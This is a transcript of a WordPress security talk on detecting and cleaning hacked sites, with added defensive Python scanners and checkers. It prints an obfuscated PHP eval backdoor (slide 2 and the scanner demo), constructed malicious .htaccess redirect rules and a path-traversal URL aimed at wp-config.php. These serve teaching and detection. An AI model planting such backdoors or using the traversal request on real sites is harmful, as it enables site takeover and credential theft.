your wordpress site is and is not hacked - you don't know until you check

YOUR SITE IS AND IS NOT HACKED @ASKWPGIRL #WCSLC

Upload: angela-bowman

Post on 21-Feb-2017

1.649 views

Category:

Technology



TRANSCRIPT

Page 1: Your WordPress Site is and is not Hacked - You don't know until you check

YOUR SITE IS AND IS NOT

HACKED @ASKWPGIRL #WCSLC

Page 2: Your WordPress Site is and is not Hacked - You don't know until you check

SCHRÖDINGER’S WEBSITE

You must assume your site is both hacked and not hacked until you open the box and find out.

<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q53b3a6'])){eval(${$s20}['q53b3a6']);}?>

Page 3: Your WordPress Site is and is not Hacked - You don't know until you check

WordPress Instructor and Custom Theme Developer

Using WordPress Since 2007 — Version 2.2

Not a security expert, but I play one on WordPress.tv

Angela Bowman

Ask WP Girl @askwpgirl

Page 4: Your WordPress Site is and is not Hacked - You don't know until you check

WHAAA?

1

Page 5: Your WordPress Site is and is not Hacked - You don't know until you check

WHY DO HACKERS HACK?

Deface sites for fun

Add spammy links to bad web neighborhoods (SEO spam)

Hijack site to add spam, porn, gambling, pay-day loans content

Steal sensitive information to sell

Distribute malware to personal computers

Use server resources for distributed attacks

Page 6: Your WordPress Site is and is not Hacked - You don't know until you check

WHAT DO HACKERS ACTUALLY DO?

Create admin account

Reset passwords

Inject malicious code into content

Add malicious code to existing files or new files

Redirect your website

http://www.wpmayor.com/wordpress-security-based-facts-statistics/

Gravity Forms hack

Page 7: Your WordPress Site is and is not Hacked - You don't know until you check

WHY SHOULD YOU CARE?

Performance issues

SEO tanks

Blacklisting or Phish Tank

Account closed

Angry customers

Page 8: Your WordPress Site is and is not Hacked - You don't know until you check

TYPICALLY, ONLY THE MOST SEVERELY HACKED SITES WILL BE BLACKLISTED OR SUSPENDED BY HOST

Many hacks are hidden

Page 9: Your WordPress Site is and is not Hacked - You don't know until you check

WHY ARE WORDPRESS SITES VULNERABLE?

41% Hosting

22% Plugins

29% Themes

8% Weak Passwords

Page 10: Your WordPress Site is and is not Hacked - You don't know until you check

RECENT VULNERABILITIES

Google Analytics

WordPress 4.2.1

Backup to Dropbox

FancyBox

TwentyFifteen

Revolution Slider

Gravity Forms

JetPack

Database of all vulnerable plugins and themes: https://wpvulndb.com/

Page 11: Your WordPress Site is and is not Hacked - You don't know until you check

LOW HANGING FRUIT

Vulnerabilities immediately published on the web

Hackers write bots to exploit vulnerabilities

Website owners are oblivious: they don’t update, use weak passwords, install tons of plugins, use not-great web hosting

Page 12: Your WordPress Site is and is not Hacked - You don't know until you check

COMMON EXPLOITS AND

HOW TO FIX

2

Page 13: Your WordPress Site is and is not Hacked - You don't know until you check

“SPOT THE HACK” GAME

A - Scan Site

B - Look at files on server

C - Find the hacked code


Page 14: Your WordPress Site is and is not Hacked - You don't know until you check

1 - Backdoors: PHP files uploaded to your server and accessed remotely. They severely affect site and server performance and are not easy to find.

Page 15: Your WordPress Site is and is not Hacked - You don't know until you check

IT'S VERY COMMON THAT BACKDOORS DON'T HAVE ANY VISIBLE SIGNS IN THE SITE CODE AND IT'S IMPOSSIBLE TO DETECT THEM BY ACCESSING THE INFECTED SITE FROM OUTSIDE. ~ SUCURI

Page 16: Your WordPress Site is and is not Hacked - You don't know until you check

2 - Drive-by Downloads: A script injected into the website generates links to malware sites or downloads malware from your site onto visitors’ computers. Easy for scanners to detect.

Page 17: Your WordPress Site is and is not Hacked - You don't know until you check

3 - Pharma Hack: Spam links injected into web pages, visible only to search engines. Difficult to scan for because they are cloaked.

https://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma-hack.html

Page 18: Your WordPress Site is and is not Hacked - You don't know until you check

4 - Malicious Redirects: Redirects traffic from your website to another, typically by modifying the .htaccess file, sometimes only when the site is viewed from a particular device or browser, such as a phone.

Hacked .htaccess file

Page 19: Your WordPress Site is and is not Hacked - You don't know until you check

DIY HACK RECOVERY

Via SFTP (preferred) or FTP

1 Backup: Download everything. Good to examine later for details of the hack if needed.

2 Delete all except: cgi-bin, .htaccess, wp-config.php (examine these)

3 Upload fresh: WordPress, Themes, Plugins, cleaned uploads

Page 20: Your WordPress Site is and is not Hacked - You don't know until you check

MONITORING TIPS

Check raw access logs via cPanel

Why are people from Thailand and Romania accessing a strangely named PHP file somewhere?

db12.php, css.php, dirs35.php????
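The raw-access-log check from the slide above, as an added example that is not part of the deck: a parser for the Apache "combined" format cPanel exposes, which flags direct requests to PHP files outside WordPress's normal entry points (the db12.php, css.php and dirs35.php names on the slide), repeated POSTs to wp-login.php from one address, and requests carrying `../` (the download.php URL from the security-plugin slide later in the deck). The log lines are constructed with RFC 5737 documentation addresses; the `EXPECTED_PHP` set, the threshold and the paths are assumptions. The country lookup the slide mentions needs a GeoIP database and is left out.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Apache / cPanel "combined" log format: ip ident user [ts] "req" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

# PHP entry points a WordPress site serves in normal operation (assumed list).
# Anything else ending in .php that is requested directly deserves a look.
EXPECTED_PHP = {"/index.php", "/wp-login.php", "/xmlrpc.php", "/wp-cron.php", "/wp-comments-post.php"}


def analyze(lines, login_threshold=10):
    """Summarize a batch of log lines: odd PHP hits, login floods, traversal attempts."""
    odd_php = defaultdict(set)   # path -> IPs that requested it directly
    logins = Counter()           # IP -> POSTs to wp-login.php
    traversal = []               # (ip, raw request path) containing ../ after URL-decoding
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        raw_path = rec["path"]
        path = raw_path.split("?", 1)[0]
        if path.lower().endswith(".php") and path not in EXPECTED_PHP and not path.startswith("/wp-admin/"):
            odd_php[path].add(rec["ip"])
        if rec["method"] == "POST" and path == "/wp-login.php":
            logins[rec["ip"]] += 1
        if "../" in unquote(raw_path):
            traversal.append((rec["ip"], raw_path))
    return {
        "odd_php": {p: sorted(ips) for p, ips in odd_php.items()},
        "login_floods": {ip: n for ip, n in logins.items() if n >= login_threshold},
        "traversal": traversal,
    }


# Template for constructed sample lines (not real traffic).
LINE = '{ip} - - [20/Feb/2017:03:14:{sec:02d} -0700] "{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0 (constructed)"'


def demo():
    """Constructed log excerpt mirroring the deck's db12.php / css.php / dirs35.php sightings."""
    lines = [
        LINE.format(ip="203.0.113.5", sec=1, method="GET", path="/", status=200),
        LINE.format(ip="203.0.113.5", sec=2, method="GET", path="/wp-admin/admin-ajax.php?action=heartbeat", status=200),
        LINE.format(ip="198.51.100.23", sec=3, method="POST", path="/wp-content/themes/urbancity/css/db12.php", status=200),
        LINE.format(ip="198.51.100.23", sec=4, method="GET", path="/wp-content/uploads/2017/02/css.php", status=200),
        LINE.format(ip="198.51.100.24", sec=5, method="GET", path="/wp-includes/dirs35.php", status=404),
        LINE.format(ip="192.0.2.77", sec=6, method="GET",
                    path="/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php",
                    status=200),
    ]
    # Twelve password guesses from one address in twelve seconds.
    lines += [LINE.format(ip="203.0.113.9", sec=10 + i, method="POST", path="/wp-login.php", status=200)
              for i in range(12)]
    return analyze(lines)


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Run it against a real file with `analyze(open("access-log").read().splitlines())`; the `odd_php` table is the one to read first, because a PHP file that only a handful of foreign addresses ever request is the pattern the slide describes.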

Page 21: Your WordPress Site is and is not Hacked - You don't know until you check

Audit Activity on Site

https://wordpress.org/plugins/wp-simple-firewall/

Page 22: Your WordPress Site is and is not Hacked - You don't know until you check

Check WordPress core integrity using Sucuri plugin https://wordpress.org/plugins/sucuri-scanner/

Run https://wordpress.org/plugins/gotmls/ to check wp-content folder

Look for modified dates, unusual names, file types that don’t belong

Compare file list to original download

Commonly hacked files: .htaccess, wp-config.php, index.php, functions.php, header.php

Any file can be hacked!

Finding PHP Back Doors

Hmmmm? PHP in a CSS folder?
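The file checks on this slide and the backdoor slides before it (PHP where only stylesheets belong, files that differ from the original download, files that do not belong at all, backdoor-style code such as the `eval(${$s20}[...])` sample on slide 2, and bad permissions), as an added example that is not part of the deck or of the Sucuri or GOTMLS plugins. It assumes you have hashed a fresh download of the same WordPress, theme and plugin versions into a `known_good` manifest; the directory names, file extensions and code patterns are assumptions, and the site tree in `demo()` is constructed.

```python
import hashlib
import os
import re
import stat
import tempfile

# Code shapes common in PHP backdoors: executing attacker-supplied data,
# variable variables (${$name}) used to hide $_POST/$_GET, decode-then-run chains.
SUSPICIOUS = [
    ("eval()", re.compile(rb"\beval\s*\(")),
    ("variable variable ${$x}", re.compile(rb"\$\{\s*\$\w+\s*\}")),
    ("base64_decode()", re.compile(rb"\bbase64_decode\s*\(", re.I)),
    ("inflate/rot13 decoder", re.compile(rb"\b(gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("preg_replace /e", re.compile(rb"preg_replace\s*\(\s*['\"][^'\"]*/e['\"]", re.I)),
    ("exec-style call on variable", re.compile(rb"\b(system|passthru|shell_exec|exec|assert)\s*\(\s*\$", re.I)),
]
# Directories that hold static assets only (assumed list); a .php file there is a red flag.
STATIC_DIRS = {"uploads", "css", "js", "images", "img", "fonts"}
PHP_EXT = (".php", ".phtml", ".php5", ".php7")


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_tree(root, known_good):
    """Walk `root` and return sorted (relative_path, reason) findings.

    `known_good` maps relative path -> sha256 of the pristine file, built by
    hashing a fresh download of the same WordPress, theme and plugin versions."""
    findings, seen = [], set()
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            seen.add(rel)
            is_php = name.lower().endswith(PHP_EXT)
            parents = rel.split("/")[:-1]
            if is_php and STATIC_DIRS.intersection(parents):
                findings.append((rel, "php file in static-asset directory"))
            if rel in known_good:
                if sha256_file(full) != known_good[rel]:
                    findings.append((rel, "content differs from original download"))
            elif is_php:
                findings.append((rel, "php file not present in original download"))
            if is_php:
                with open(full, "rb") as f:
                    data = f.read()
                hits = [label for label, rx in SUSPICIOUS if rx.search(data)]
                if hits:
                    findings.append((rel, "suspicious code: " + ", ".join(hits)))
            if os.stat(full).st_mode & stat.S_IWOTH:
                findings.append((rel, "world-writable"))
    for rel in known_good:
        if rel not in seen:
            findings.append((rel, "missing, but present in original download"))
    return sorted(findings)


def demo():
    """Constructed mini site: clean index.php and stylesheet, a manifest taken from
    them, then a dropped backdoor and a tampered index.php."""
    root = tempfile.mkdtemp()
    clean = {
        "index.php": b"<?php\ndefine('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n",
        "wp-content/themes/mytheme/style.css": b"/*\nTheme Name: mytheme\n*/\n",
    }
    # The backdoor shown on slide 2 of the deck, dropped into the theme's css folder.
    backdoor = b"""<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q53b3a6'])){eval(${$s20}['q53b3a6']);}?>"""
    for rel, data in list(clean.items()) + [("wp-content/themes/mytheme/css/db12.php", backdoor)]:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)
        os.chmod(path, 0o644)
    known_good = {rel: hashlib.sha256(data).hexdigest() for rel, data in clean.items()}
    # Attacker appends a loader to index.php after the manifest was taken.
    with open(os.path.join(root, "index.php"), "ab") as f:
        f.write(b"<?php @include 'wp-content/themes/mytheme/css/db12.php'; ?>\n")
    return scan_tree(root, known_good)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

The manifest comparison is what catches a modified core or theme file regardless of what was put in it; the pattern list only catches code that looks like the sample on slide 2, so treat a hit as a reason to open the file, not as proof either way.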

Page 23: Your WordPress Site is and is not Hacked - You don't know until you check

Finding and Removing Malicious Redirects

Listen when someone tells you that they tried to visit your site and couldn’t, and find out which browser or device they were using at the time.

Use http://www.botsvsbrowsers.com/SimulateUserAgent.asp to verify

Scan with Sucuri’s SiteCheck

Check all the .htaccess files on the server and remove the redirect.

https://sitecheck.sucuri.net/
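The two checks on this slide and on the malicious-redirects slide before it, as an added example that is not part of the deck or of Sucuri's SiteCheck: a reader for .htaccess that reports RewriteRule/Redirect targets on a host other than your own, together with the RewriteCond lines that gate them (a condition on HTTP_USER_AGENT or HTTP_REFERER is the "only on a phone" cloaking the slide describes), and a probe that requests the same URL once per user agent without following redirects, which is the outside view of the same thing. The .htaccess text, the `redirect-target.invalid` host and the user-agent strings are constructed; `fake_fetch` stands in for a live server so `demo()` runs offline.

```python
import re
import urllib.error
import urllib.request

# Constructed .htaccess: WordPress's own rewrite block, then two injected blocks
# of the kind described on the malicious-redirects slide.
HTACCESS_SAMPLE = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
RewriteCond %{HTTP_USER_AGENT} (android|iphone|ipod|blackberry) [NC]
RewriteRule ^(.*)$ http://redirect-target.invalid/go.php?u=$1 [R=302,L]
RewriteCond %{HTTP_REFERER} (google|bing|yahoo) [NC]
RewriteRule .* http://redirect-target.invalid/seo [R,L]
Redirect 301 /old-page /new-page
"""

CLOAK_VARS = ("HTTP_USER_AGENT", "HTTP_REFERER", "REMOTE_ADDR", "HTTP_COOKIE")
DIRECTIVE_RE = re.compile(r"(RewriteRule|Redirect(?:Match|Permanent|Temp)?)\s+(.*)", re.I)
HOST_RE = re.compile(r"https?://([^/\s\"']+)", re.I)


def find_foreign_redirects(text, own_hosts):
    """Return rules that send visitors to a host outside `own_hosts`, with the
    RewriteCond lines gating each one and whether those conditions cloak it."""
    own = {h.lower() for h in own_hosts}
    findings, pending = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.lower().startswith("rewritecond"):
            pending.append(line)
            continue
        m = DIRECTIVE_RE.match(line)
        if not m:
            continue
        host = HOST_RE.search(m.group(2))
        if host and host.group(1).lower() not in own:
            findings.append({
                "line": lineno,
                "rule": line,
                "target_host": host.group(1),
                "conditions": list(pending),
                "cloaked": any(v in c for c in pending for v in CLOAK_VARS),
            })
        pending = []  # RewriteCond lines apply only to the next RewriteRule
    return findings


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # do not follow; the 3xx surfaces as an HTTPError instead


def fetch_status(url, user_agent):
    """Request `url` with the given User-Agent; return (status, Location or None)."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:
        return err.code, err.headers.get("Location")


USER_AGENTS = {  # constructed, abbreviated strings
    "desktop": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/56.0 Safari/537.36",
    "iphone": "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.4.6 Mobile/14D27 Safari/602.1",
    "googlebot": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
}


def probe_user_agents(url, agents=USER_AGENTS, fetch=fetch_status):
    """Fetch `url` once per user agent. Disagreeing rows are a cloaked redirect seen from outside."""
    results = {name: fetch(url, ua) for name, ua in agents.items()}
    return results, len(set(results.values())) == 1


def fake_fetch(url, user_agent):
    """Offline stand-in for fetch_status that behaves like a server running HTACCESS_SAMPLE."""
    if re.search(r"android|iphone|ipod|blackberry", user_agent, re.I):
        return 302, "http://redirect-target.invalid/go.php?u="
    return 200, None


def demo():
    rules = find_foreign_redirects(HTACCESS_SAMPLE, own_hosts={"www.example.com", "example.com"})
    probe, consistent = probe_user_agents("http://www.example.com/", fetch=fake_fetch)
    return rules, probe, consistent
```

Run `find_foreign_redirects` over every .htaccess on the server, not just the one in the web root, since the slide says to check them all; `probe_user_agents("https://your-site.example/")` with the real `fetch_status` does the live comparison the slide recommends doing through the user-agent simulator.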

Page 24: Your WordPress Site is and is not Hacked - You don't know until you check

Use Google Search Console!

Google Webmaster Tools/Search Console:

Search Queries – you can spot queries irrelevant to your site.

Links to Your Site – you can find suspicious incoming links here.

Internal Links – this report can help reveal rogue sections of your site.

http://askwpgirl.com/submitting-wordpress-site-google-webmaster-tools/

Page 25: Your WordPress Site is and is not Hacked - You don't know until you check

Check for rogue users and posts

Your new admin friends?

Find hidden admin users: http://snipe.net/2010/01/when-wordpress-gets-hacked/
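The rogue-user check above, as an added example that is not part of the deck or the linked article: rather than trusting the dashboard's user list, query the database directly for every account whose serialized capabilities contain `administrator` and compare the result with the list of admins you keep outside the site. The SQL is the same one you would paste into phpMyAdmin or the mysql CLI (the `meta_key` carries the table prefix, `wp_capabilities` for the default `wp_`); `demo()` builds a constructed copy of the two tables in SQLite so it runs offline, and the user names and dates in it are invented.

```python
import sqlite3

# Same query for MySQL; {p} is the table prefix from wp-config.php.
ADMIN_QUERY = """
SELECT u.ID, u.user_login, u.user_email, u.user_registered, m.meta_value
FROM {p}users AS u
JOIN {p}usermeta AS m ON m.user_id = u.ID
WHERE m.meta_key = '{p}capabilities'
  AND m.meta_value LIKE '%administrator%'
ORDER BY u.ID
"""


def list_admins(conn, prefix="wp_"):
    """Every account whose capabilities blob contains 'administrator'."""
    cur = conn.execute(ADMIN_QUERY.format(p=prefix))
    cols = [c[0] for c in cur.description]
    return [dict(zip(cols, row)) for row in cur.fetchall()]


def unexpected_admins(conn, expected_logins, prefix="wp_"):
    """Admins that are not on the list you maintain outside the site."""
    return [a for a in list_admins(conn, prefix) if a["user_login"] not in expected_logins]


def demo():
    """Constructed in-memory copy of wp_users / wp_usermeta: one legitimate admin,
    one editor, and one admin account nobody on the team created."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_email TEXT,
                               user_registered TEXT, display_name TEXT);
        CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
                                  meta_key TEXT, meta_value TEXT);
        INSERT INTO wp_users VALUES
          (1, 'angela', 'angela@example.com', '2007-05-16 10:00:00', 'Angela'),
          (2, 'editor_jane', 'jane@example.com', '2015-03-02 09:12:00', 'Jane'),
          (3, 'wp-admin-backup', 'svc@mail.invalid', '2017-02-19 03:14:07', 'wp-admin-backup');
        INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES
          (1, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'),
          (2, 'wp_capabilities', 'a:1:{s:6:"editor";b:1;}'),
          (3, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'),
          (3, 'show_admin_bar_front', 'false');
    """)
    return unexpected_admins(conn, expected_logins={"angela"})


if __name__ == "__main__":
    for admin in demo():
        print(admin["ID"], admin["user_login"], admin["user_email"], admin["user_registered"])
```

The `user_registered` column is worth reading alongside the login name: an administrator created in the window when you first noticed trouble is the "new admin friend" the slide refers to.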

Page 26: Your WordPress Site is and is not Hacked - You don't know until you check

IMMEDIATELY CHANGE PASSWORDS

Use Sucuri plugin to Generate New Security Keys

Reset all passwords, including WordPress users, FTP, web hosting, control panel

Scan computer for viruses!

Page 27: Your WordPress Site is and is not Hacked - You don't know until you check

CLEAN UP “BAD” HACK

If hackers got admin access to the site or database, you might have to nuke the entire site from orbit — it’s the only way to be sure

https://www.youtube.com/watch?v=aCbfMkh940Q

See http://askwpgirl.com/nuke-it-from-orbit/ for step-by-step elimination

Or contact sucuri.net for site clean up and monitoring

Page 28: Your WordPress Site is and is not Hacked - You don't know until you check

REQUEST SITE REVIEW

If Google blacklisted your site or marked it as a phishing scam, you will need to request a review after you are certain you’ve cleaned up all hacked files:

https://support.google.com/webmasters/answer/168328?hl=en

Page 29: Your WordPress Site is and is not Hacked - You don't know until you check

SECURITY BASICS

3

Page 30: Your WordPress Site is and is not Hacked - You don't know until you check

UPDATE UPDATE UPDATE

Timely updates are critical for security. Tools: iControlWP, MainWP, InfiniteWP, Jetpack, ManageWP

http://askwpgirl.com/updating-wordpress-plugins-themes-core/

Page 31: Your WordPress Site is and is not Hacked - You don't know until you check

SECURE YOUR LOGIN

Online Generator: http://www.pctools.com/guides/password/

Track Passwords: http://agilebits.com/products/1Password

Enable Two-Factor Authentication: http://askwpgirl.com/wordpress-two-factor-authentication-plugins/

Avoid logging in on public WiFi Networks

Page 32: Your WordPress Site is and is not Hacked - You don't know until you check

RUN A TIGHT SHIP!

Delete ALL unused stuff on server

Only use popular and well-maintained themes and plugins

Don’t allow users to register (Settings > General)

Always hold comments for moderation and use spam filtering (Akismet plugin)

Page 33: Your WordPress Site is and is not Hacked - You don't know until you check

GOOD HOSTING

Correct File Permissions

WordPress Auto Updates

Firewall and Scanning

Regular Backups

Server Security

Performance Optimization

Managed WordPress Hosts: SiteGround, WP Engine, Get Flywheel, WebSynthesis, Pantheon

Page 34: Your WordPress Site is and is not Hacked - You don't know until you check

EFFECTIVE SECURITY PLUGIN FEATURES

Limit login access

Block bad URL requests with a Firewall

Audit activity

Security through obscurity is not security

IP addresses don’t matter and should not be used as the foundation of a WordPress security policy

My favorite security plugin: https://wordpress.org/plugins/wp-simple-firewall/

Does all the above and more. Will notify you of vulnerable plugins.

mywebsite.com/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
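The request on the slide above is a path-traversal attempt: a theme's download script is asked for `../../../../../wp-config.php`, the file holding the database credentials. A firewall blocks such requests at the URL; the fix in the script itself is to resolve the requested name and refuse anything that lands outside the download folder. The following is an added example in Python, not the theme's PHP or the plugin's code: `resolve_download` returns a path only when it is inside the base directory after `..` segments and symlinks are resolved and its extension is on an allowlist. The directory layout, `ALLOWED_EXT` and the file contents in `demo()` are constructed.

```python
import os
import tempfile

ALLOWED_EXT = {".pdf", ".zip", ".png", ".jpg"}  # assumed allowlist for a download script


def resolve_download(base_dir, requested):
    """Map a user-supplied file name onto a path inside `base_dir`.

    Returns the absolute path, or None if the name is empty or absolute, contains a
    NUL byte, escapes the directory via .. or a symlink, has an extension outside
    ALLOWED_EXT, or does not exist as a regular file."""
    if not requested or os.path.isabs(requested) or "\x00" in requested:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    # realpath() collapses .. and follows symlinks, so one containment check on
    # the result covers both ../../wp-config.php and a planted symlink.
    if os.path.commonpath([base, candidate]) != base:
        return None
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXT:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def demo():
    """Constructed layout: <site>/wp-config.php beside <site>/downloads/report.pdf."""
    site = tempfile.mkdtemp()
    downloads = os.path.join(site, "downloads")
    os.makedirs(downloads)
    with open(os.path.join(site, "wp-config.php"), "w") as f:
        f.write("<?php define('DB_PASSWORD', 'constructed-secret');\n")
    with open(os.path.join(downloads, "report.pdf"), "wb") as f:
        f.write(b"%PDF-1.4 constructed\n")
    with open(os.path.join(downloads, "loader.php"), "w") as f:
        f.write("<?php\n")
    results = {
        "legit": resolve_download(downloads, "report.pdf"),
        "traversal": resolve_download(downloads, "../../../../../wp-config.php"),
        "parent": resolve_download(downloads, "../wp-config.php"),
        "absolute": resolve_download(downloads, os.path.join(site, "wp-config.php")),
        "php_inside": resolve_download(downloads, "loader.php"),
    }
    try:  # a symlink planted inside the folder still resolves outside it
        os.symlink(os.path.join(site, "wp-config.php"), os.path.join(downloads, "notes.pdf"))
        results["symlink"] = resolve_download(downloads, "notes.pdf")
    except OSError:
        pass  # platform without symlink support; the other cases still run
    return results


if __name__ == "__main__":
    for case, path in demo().items():
        print(f"{case}: {'served ' + path if path else 'refused'}")
```

The same idea in PHP is `realpath()` on the joined path followed by a prefix check against `realpath()` of the download folder; the web-server-side rule the slide's firewall applies is simpler and coarser, rejecting any request whose decoded query contains `../`.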

Page 35: Your WordPress Site is and is not Hacked - You don't know until you check

BACKUPS

Common wisdom is to backup your site

Backups are to your site what major medical health care coverage is to your health

Usually only helpful in case of a disaster

Services: VaultPress and WorpDrive are good hosted solutions!

Plugins: BackupBuddy (paid), BackWPup, Duplicator

Page 36: Your WordPress Site is and is not Hacked - You don't know until you check

SECURE YOUR COMPUTER

Scan for viruses and trojans

Be careful about downloading stuff!!!!

Page 37: Your WordPress Site is and is not Hacked - You don't know until you check

RESOURCES

http://snipe.net/2010/01/when-wordpress-gets-hacked/

https://support.google.com/webmasters/answer/163633?rd=1 ***

http://aw-snap.info/articles/find-backdoor.php

http://codex.wordpress.org/FAQ_My_site_was_hacked

http://sucuri.net - free scan, hack recovering, site monitoring, great posts on how to clean up specific hacks

http://askwpgirl.com/nuke-it-from-orbit

https://www.icontrolwp.com/2014/05/wordpress-security-simple-firewall-plugin-part-4-login-protection-feature/

https://www.icontrolwp.com/2014/06/beware-new-security-theat-wordpress-misinformation-virus/

About the banking hack: https://www.proofpoint.com/es/node/327

Top 10 Web application security risks for developers: https://youtu.be/nuWR_HiBHYc

http://www.smashingmagazine.com/2012/10/four-malware-infections-wordpress/

Page 38: Your WordPress Site is and is not Hacked - You don't know until you check

CONTACT

facebook.com/askwpgirl

twitter.com/askwpgirl

http://askwpgirl.com

http://boulderdigitalarts.com

One-on-One consulting third Friday of every month at Boulder Digital Arts

Six-week theme customization course in Colorado and online.

SEO and Best Maintenance Tips Newsletter http://askwpgirl.com